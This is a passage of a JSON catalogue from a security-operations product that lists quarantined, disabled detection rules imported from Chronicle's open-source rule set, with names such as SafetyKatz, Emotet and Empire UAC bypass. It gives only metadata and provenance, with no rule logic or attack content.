"detections/chronicle-imports/_quarantine/detect-when-a-process-tries-to-allow-execution-of-malicious-email-attachments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_when_a_process_tries_to_allow_execution_of_malicious_email_attachments", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detect_when_a_process_tries_to_allow_execution_of_malicious_e_mail_attachments.yaral" } }, { "id": "chronicle-detection-rules-detect-when-the-guest-account-is-enabled", "type": "detection", "name": "detect_when_the_guest_account_is_enabled", "description": "detect_when_the_guest_account_is_enabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-when-the-guest-account-is-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_when_the_guest_account_is_enabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/detect_when_the_guest_account_is_enabled.yaral" } }, { "id": "chronicle-detection-rules-detect-windows-password-policy-changes", "type": "detection", "name": "detect_windows_password_policy_changes", "description": "detect_windows_password_policy_changes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-windows-password-policy-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_windows_password_policy_changes", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/detect_windows_password_policy_changes.yaral" } }, { "id": "chronicle-detection-rules-detecting-gamaredon-groups-cc-servers-ip-addresses-and-domains-proxy", "type": "detection", "name": "detecting_gamaredon_groups_cc_servers_ip_addresses_and_domains_proxy", "description": "detecting_gamaredon_groups_cc_servers_ip_addresses_and_domains_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detecting-gamaredon-groups-cc-servers-ip-addresses-and-domains-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detecting_gamaredon_groups_cc_servers_ip_addresses_and_domains_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/detecting_gamaredon_group_s_c_c_servers_ip_addresses_and_domains__proxy.yaral" } }, { "id": "chronicle-detection-rules-detecting-phishing-domains-proxy", "type": "detection", "name": "detecting_phishing_domains_proxy", "description": "detecting_phishing_domains_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detecting-phishing-domains-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detecting_phishing_domains_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/detecting_phishing_domains__proxy.yaral" } }, { "id": "chronicle-detection-rules-detection-of-com-hijacking", "type": "detection", "name": "detection_of_com_hijacking", "description": "detection_of_com_hijacking", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detection-of-com-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detection_of_com_hijacking", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/detection_of_com_hijacking.yaral" } }, { "id": "chronicle-detection-rules-detection-of-powershell-execution-via-dll", "type": "detection", "name": "detection_of_powershell_execution_via_dll", "description": "detection_of_powershell_execution_via_dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detection-of-powershell-execution-via-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detection_of_powershell_execution_via_dll", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detection_of_powershell_execution_via_dll.yaral" } }, { "id": "chronicle-detection-rules-detection-of-safetykatz", "type": "detection", "name": "detection_of_safetykatz", "description": "detection_of_safetykatz", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detection-of-safetykatz.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detection_of_safetykatz", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/detection_of_safetykatz.yaral" } }, { "id": "chronicle-detection-rules-detection-of-winrs-usage", "type": "detection", "name": "detection_of_winrs_usage", "description": "detection_of_winrs_usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detection-of-winrs-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detection_of_winrs_usage", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detection_of_winrs_usage.yaral" } }, { "id": "chronicle-detection-rules-detects-coronavirus-used-in-malicious-campaigns", "type": "detection", "name": "detects_coronavirus_used_in_malicious_campaigns", "description": "detects_coronavirus_used_in_malicious_campaigns", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detects-coronavirus-used-in-malicious-campaigns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detects_coronavirus_used_in_malicious_campaigns", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/detects_coronavirus_used_in_malicious_campaigns.yaral" } }, { "id": "chronicle-detection-rules-detects-local-user-creation", "type": "detection", "name": "detects_local_user_creation", "description": "detects_local_user_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detects-local-user-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detects_local_user_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/detects_local_user_creation.yaral" } }, { "id": "chronicle-detection-rules-detects-malware-acrord32exe-execution-process", "type": "detection", "name": "detects_malware_acrord32exe_execution_process", "description": "detects_malware_acrord32exe_execution_process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detects-malware-acrord32exe-execution-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detects_malware_acrord32exe_execution_process", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/detects_malware_acrord32_exe_execution_process.yaral" } }, { "id": "chronicle-detection-rules-detects-powershell-attack-via-av-ids", "type": "detection", "name": "detects_powershell_attack_via_av_ids", "description": "detects_powershell_attack_via_av_ids", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detects-powershell-attack-via-av-ids.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detects_powershell_attack_via_av_ids", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/antivirus/detects_powershell_attack__via_av_ids.yaral" } }, { "id": "chronicle-detection-rules-direct-autorun-keys-modification", "type": "detection", "name": "direct_autorun_keys_modification", "description": "direct_autorun_keys_modification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/direct-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "direct_autorun_keys_modification", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/direct_autorun_keys_modification.yaral" } }, { "id": "chronicle-detection-rules-disable-internal-tools-or-feature-in-registry", "type": "detection", "name": "disable_internal_tools_or_feature_in_registry", "description": "disable_internal_tools_or_feature_in_registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/disable-internal-tools-or-feature-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "disable_internal_tools_or_feature_in_registry", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/disable_internal_tools_or_feature_in_registry.yaral" } }, { "id": "chronicle-detection-rules-disable-services-startup-detected", "type": "detection", "name": "disable_services_startup_detected", "description": "disable_services_startup_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/disable-services-startup-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "disable_services_startup_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/disable_services_startup_detected.yaral" } }, { "id": "chronicle-detection-rules-diskshadow-and-vshadow-launch-detection", "type": "detection", "name": "diskshadow_and_vshadow_launch_detection", "description": "diskshadow_and_vshadow_launch_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/diskshadow-and-vshadow-launch-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "diskshadow_and_vshadow_launch_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/diskshadow_and_vshadow_launch_detection.yaral" } }, { "id": "chronicle-detection-rules-dns-query-to-recently-created-domain", "type": "detection", "name": "dns_query_to_recently_created_domain", "description": "dns_query_to_recently_created_domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/dns-query-to-recently-created-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "dns_query_to_recently_created_domain", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/dns_query_to_recently_created_domain.yaral" } }, { "id": "chronicle-detection-rules-dns-txt-answer-with-possible-execution-strings", "type": "detection", "name": "dns_txt_answer_with_possible_execution_strings", "description": "dns_txt_answer_with_possible_execution_strings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/dns-txt-answer-with-possible-execution-strings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "dns_txt_answer_with_possible_execution_strings", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/dns/dns_txt_answer_with_possible_execution_strings.yaral" } }, { "id": "chronicle-detection-rules-docker-user-agent", "type": "detection", "name": "docker_user_agent", "description": "docker_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/docker-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "docker_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/docker_user_agent.yaral" } }, { "id": "chronicle-detection-rules-domain-prevalence", "type": "detection", "name": "domain_prevalence", "description": "domain_prevalence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/domain-prevalence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "domain_prevalence", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/domain_prevalence.yaral" } }, { "id": "chronicle-detection-rules-download-from-suspicious-dyndns-hosts", "type": "detection", "name": "download_from_suspicious_dyndns_hosts", "description": "download_from_suspicious_dyndns_hosts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/download-from-suspicious-dyndns-hosts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "download_from_suspicious_dyndns_hosts", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/download_from_suspicious_dyndns_hosts.yaral" } }, { "id": "chronicle-detection-rules-download-from-suspicious-tld", "type": "detection", "name": "download_from_suspicious_tld", "description": "download_from_suspicious_tld", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/download-from-suspicious-tld.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "download_from_suspicious_tld", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/download_from_suspicious_tld.yaral" } }, { "id": "chronicle-detection-rules-draytek-preauth-remote-root-rce", "type": "detection", "name": "draytek_preauth_remote_root_rce", "description": "draytek_preauth_remote_root_rce", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/draytek-preauth-remote-root-rce.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "draytek_preauth_remote_root_rce", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/webserver/draytek_pre_auth_remote_root_rce.yaral" } }, { "id": "chronicle-detection-rules-dridex-process-pattern", "type": "detection", "name": "dridex_process_pattern", "description": "dridex_process_pattern", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/dridex-process-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "dridex_process_pattern", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/dridex_process_pattern.yaral" } }, { "id": "chronicle-detection-rules-dynamic-data-exchange-spawning-commandline-or-powershell-detector-sysmon-behavio", "type": "detection", "name": "dynamic_data_exchange_spawning_commandline_or_powershell_detector_sysmon_behavior", "description": "dynamic_data_exchange_spawning_commandline_or_powershell_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/dynamic-data-exchange-spawning-commandline-or-powershell-detector-sysmon-behavio.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "dynamic_data_exchange_spawning_commandline_or_powershell_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/dynamic_data_exchange_spawning_command_line_or_powershell_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-ekanssnake-ransomware-sysmon-detection", "type": "detection", "name": "ekanssnake_ransomware_sysmon_detection", "description": "ekanssnake_ransomware_sysmon_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ekanssnake-ransomware-sysmon-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ekanssnake_ransomware_sysmon_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/ekans_snake_ransomware__sysmon_detection.yaral" } }, { "id": "chronicle-detection-rules-emotet-process-creation", "type": "detection", "name": "emotet_process_creation", "description": "emotet_process_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/emotet-process-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "emotet_process_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/emotet_process_creation.yaral" } }, { "id": "chronicle-detection-rules-emotet-through-word-document-sysmon-behavior", "type": "detection", "name": "emotet_through_word_document_sysmon_behavior", "description": "emotet_through_word_document_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/emotet-through-word-document-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "emotet_through_word_document_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/emotet_through_word_document__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-empire-monkey", "type": "detection", "name": "empire_monkey", "description": "empire_monkey", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/empire-monkey.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "empire_monkey", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/empire_monkey.yaral" } }, { "id": "chronicle-detection-rules-empire-powershell-uac-bypass", "type": "detection", "name": "empire_powershell_uac_bypass", "description": "empire_powershell_uac_bypass", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/empire-powershell-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "empire_powershell_uac_bypass", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/empire_powershell_uac_bypass.yaral" } }, { "id": "chronicle-detection-rules-empire-user-agents-proxy", "type": "detection", "name": "empire_user_agents_proxy", "description": "empire_user_agents_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/empire-user-agents-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "empire_user_agents_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/empire_user_agents__proxy.yaral" } }, { "id": "chronicle-detection-rules-enabling-rdp-remotely-using-psexec", "type": "detection", "name": "enabling_rdp_remotely_using_psexec", "description": "enabling_rdp_remotely_using_psexec", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/enabling-rdp-remotely-using-psexec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "enabling_rdp_remotely_using_psexec", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/enabling_rdp_remotely_using_psexec.yaral" } }, { "id": "chronicle-detection-rules-encoded-frombase64string", "type": "detection", "name": "encoded_frombase64string", "description": "encoded_frombase64string", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/encoded-frombase64string.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "encoded_frombase64string", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/encoded_frombase64string.yaral" } }, { "id": "chronicle-detection-rules-encoded-iex", "type": "detection", "name": 